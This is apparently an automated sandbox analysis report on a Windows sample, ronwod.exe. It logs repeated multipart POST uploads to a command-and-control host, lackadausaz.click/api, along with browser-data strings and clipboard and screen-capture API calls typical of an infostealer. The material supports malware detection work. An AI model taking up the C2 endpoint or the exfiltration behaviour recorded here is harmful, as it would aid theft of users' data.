Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YL3799S95WVHVMF2DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: lackadausaz.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=765ACRZ7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20378Host: lackadausaz.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BQZNCO6AGO28QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1226Host: lackadausaz.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=B3LFISRH0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572520Host: lackadausaz.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 83Host: lackadausaz.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: lackadausaz.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lackadausaz.click

Source: ronwod.exe, 00000000.00000003.1750510292.0000000003FAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: ronwod.exe, 00000000.00000003.1750510292.0000000003FAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: ronwod.exe, 00000000.00000003.1750181906.0000000001024000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1724682742.0000000001024000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1802540214.0000000001024000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1750624772.0000000001024000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1673073544.0000000001024000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1896775903.0000000001032000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1896473117.0000000001026000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1775565703.0000000001024000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1701708029.0000000001024000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1798548795.0000000001024000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1875175343.0000000001024000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1728584108.0000000001024000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: ronwod.exe, 00000000.00000003.1750510292.0000000003FAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: ronwod.exe, 00000000.00000003.1750510292.0000000003FAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ronwod.exe, 00000000.00000003.1750510292.0000000003FAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ronwod.exe, 00000000.00000003.1750510292.0000000003FAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: ronwod.exe, 00000000.00000003.1750510292.0000000003FAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: ronwod.exe, 00000000.00000003.1750510292.0000000003FAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: ronwod.exe, 00000000.00000003.1750510292.0000000003FAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: ronwod.exe, 00000000.00000003.1750510292.0000000003FAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: ronwod.exe, 00000000.00000003.1750510292.0000000003FAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: ronwod.exe, 00000000.00000003.1698380831.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1697961335.0000000003FBB000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1698795828.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: ronwod.exe, 00000000.00000003.1751979365.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: ronwod.exe, 00000000.00000003.1751979365.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: ronwod.exe, 00000000.00000003.1698380831.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1697961335.0000000003FBB000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1698795828.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ronwod.exe, 00000000.00000003.1698380831.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1697961335.0000000003FBB000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1698795828.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ronwod.exe, 00000000.00000003.1698380831.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1697961335.0000000003FBB000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1698795828.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ronwod.exe, 00000000.00000003.1751979365.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: ronwod.exe, 00000000.00000003.1751979365.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: ronwod.exe, 00000000.00000003.1698380831.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1697961335.0000000003FBB000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1698795828.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ronwod.exe, 00000000.00000003.1698380831.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1697961335.0000000003FBB000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1698795828.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ronwod.exe, 00000000.00000003.1698380831.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1697961335.0000000003FBB000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1698795828.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ronwod.exe, 00000000.00000003.1751979365.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: ronwod.exe, 00000000.00000002.1973576240.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/
Source: ronwod.exe, 00000000.00000003.1775565703.000000000105C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click//
Source: ronwod.exe, 00000000.00000002.1973493421.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1896473117.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/D
Source: ronwod.exe, 00000000.00000003.1728584108.000000000105C000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1701708029.000000000105C000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1724682742.000000000105C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/F
Source: ronwod.exe, 00000000.00000003.1701708029.000000000105C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/R
Source: ronwod.exe, 00000000.00000003.1896473117.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/api
Source: ronwod.exe, 00000000.00000003.1816042398.0000000003F82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/api#
Source: ronwod.exe, 00000000.00000003.1701781398.0000000003F80000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1728154349.0000000003F76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/api3Bl1
Source: ronwod.exe, 00000000.00000003.1750046187.0000000003F78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/api7jy
Source: ronwod.exe, 00000000.00000003.1750093043.000000000105C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/apiLo
Source: ronwod.exe, 00000000.00000003.1798495056.000000000105C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/apiUo)
Source: ronwod.exe, 00000000.00000003.1775519160.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/apib
Source: ronwod.exe, 00000000.00000003.1701781398.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/apicQqi
Source: ronwod.exe, 00000000.00000003.1701708029.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1724682742.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1750093043.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1728584108.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1750624772.0000000000FED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/apieH;
Source: ronwod.exe, 00000000.00000003.1816381307.000000000105C000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1803349034.000000000105C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/apino.
Source: ronwod.exe, 00000000.00000003.1750046187.0000000003F78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/apinpLY
Source: ronwod.exe, 00000000.00000003.1875175343.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1775565703.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1798548795.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1802540214.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/apite/I3
Source: ronwod.exe, 00000000.00000003.1673073544.0000000000FED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/c
Source: ronwod.exe, 00000000.00000003.1728584108.000000000105C000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1750093043.000000000105C000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1701708029.000000000105C000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1724682742.000000000105C000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1750624772.000000000105C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/e
Source: ronwod.exe, 00000000.00000003.1803349034.000000000105C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/g
Source: ronwod.exe, 00000000.00000003.1673073544.0000000000FED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/s
Source: ronwod.exe, 00000000.00000003.1816381307.000000000105C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click:443/api
Source: ronwod.exe, 00000000.00000003.1701416116.0000000004015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: ronwod.exe, 00000000.00000003.1751724024.0000000004098000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: ronwod.exe, 00000000.00000003.1751724024.0000000004098000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: ronwod.exe, 00000000.00000003.1701673512.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1728215344.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1724648396.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1701544346.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1701416116.0000000004013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: ronwod.exe, 00000000.00000003.1701544346.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: ronwod.exe, 00000000.00000003.1701673512.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1728215344.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1724648396.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1701544346.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1701416116.0000000004013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: ronwod.exe, 00000000.00000003.1701544346.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: ronwod.exe, 00000000.00000003.1751979365.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: ronwod.exe, 00000000.00000003.1698380831.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1697961335.0000000003FBB000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1698795828.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: ronwod.exe, 00000000.00000003.1751979365.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: ronwod.exe, 00000000.00000003.1698380831.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1697961335.0000000003FBB000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1698795828.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: ronwod.exe, 00000000.00000003.1751724024.0000000004098000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: ronwod.exe, 00000000.00000003.1751724024.0000000004098000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: ronwod.exe, 00000000.00000003.1751724024.0000000004098000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: ronwod.exe, 00000000.00000003.1751724024.0000000004098000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: ronwod.exe, 00000000.00000003.1751724024.0000000004098000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 104.21.92.219:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.219:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.219:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.219:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.219:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.219:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.219:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.219:443 -> 192.168.2.4:49741 version: TLS 1.2

Source: C:\Users\user\Desktop\ronwod.exe

Code function: 0_2_00EC22E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

0_2_00EC22E0

Source: C:\Users\user\Desktop\ronwod.exe

Code function: 0_2_00EC22E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

0_2_00EC22E0

Source: C:\Users\user\Desktop\ronwod.exe

Code function: 0_2_00EC328C GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

0_2_00EC328C

Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_0023346D	0_2_0023346D
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00232A83	0_2_00232A83
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EBC8D0	0_2_00EBC8D0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00E9A8B0	0_2_00E9A8B0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00ECB1D0	0_2_00ECB1D0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EC7960	0_2_00EC7960
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00ECF150	0_2_00ECF150
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EA0247	0_2_00EA0247
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00ECFB10	0_2_00ECFB10
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EC7CF0	0_2_00EC7CF0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00E99C6F	0_2_00E99C6F
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EB1570	0_2_00EB1570
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EB6520	0_2_00EB6520
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EB3675	0_2_00EB3675
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00E9C621	0_2_00E9C621
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00E938F0	0_2_00E938F0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EA90D1	0_2_00EA90D1
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EC20B0	0_2_00EC20B0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EB4060	0_2_00EB4060
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EA602C	0_2_00EA602C
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00ECE820	0_2_00ECE820
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00ECE9D0	0_2_00ECE9D0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EA51A9	0_2_00EA51A9
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00E9E9B0	0_2_00E9E9B0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00E961B0	0_2_00E961B0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EB69B0	0_2_00EB69B0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EA4161	0_2_00EA4161
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EA717B	0_2_00EA717B
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EA8170	0_2_00EA8170
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EC7170	0_2_00EC7170
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00ECB940	0_2_00ECB940
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00ECE920	0_2_00ECE920
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00E95930	0_2_00E95930
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EA9930	0_2_00EA9930
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00E99100	0_2_00E99100
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EAD900	0_2_00EAD900
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EB5ACF	0_2_00EB5ACF
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00E982C0	0_2_00E982C0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EB5ACF	0_2_00EB5ACF
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00E942A0	0_2_00E942A0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EACAA0	0_2_00EACAA0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EB5A90	0_2_00EB5A90
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00E9B262	0_2_00E9B262
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00ECEA60	0_2_00ECEA60
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EA5A72	0_2_00EA5A72
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EB822F	0_2_00EB822F
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EBF211	0_2_00EBF211
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00E94BE0	0_2_00E94BE0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EC73D0	0_2_00EC73D0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EA138A	0_2_00EA138A
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EAE390	0_2_00EAE390
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00E9EB3B	0_2_00E9EB3B
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00E9FB02	0_2_00E9FB02
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00E9FCCE	0_2_00E9FCCE
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EA64A3	0_2_00EA64A3
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EBB48C	0_2_00EBB48C
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EA0C83	0_2_00EA0C83
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EC0470	0_2_00EC0470
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EB3C40	0_2_00EB3C40
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EBCC5D	0_2_00EBCC5D
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00ECF450	0_2_00ECF450
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EB7C29	0_2_00EB7C29
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00E97410	0_2_00E97410
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EB85E1	0_2_00EB85E1
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EADDC0	0_2_00EADDC0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EBF5D9	0_2_00EBF5D9
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EAADD0	0_2_00EAADD0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EC6569	0_2_00EC6569
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00E99570	0_2_00E99570
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EBBD77	0_2_00EBBD77
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EB7551	0_2_00EB7551
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EBDEF1	0_2_00EBDEF1
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EB3EC0	0_2_00EB3EC0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EC86C0	0_2_00EC86C0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00E92ED0	0_2_00E92ED0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EC5ED3	0_2_00EC5ED3
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EA16A0	0_2_00EA16A0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EBC8D0	0_2_00EBC8D0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EBBE9D	0_2_00EBBE9D
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EBCE60	0_2_00EBCE60
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00E96640	0_2_00E96640
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EC8E40	0_2_00EC8E40
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00ECB650	0_2_00ECB650
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 0_2_00EC1E50	0_2_00EC1E50
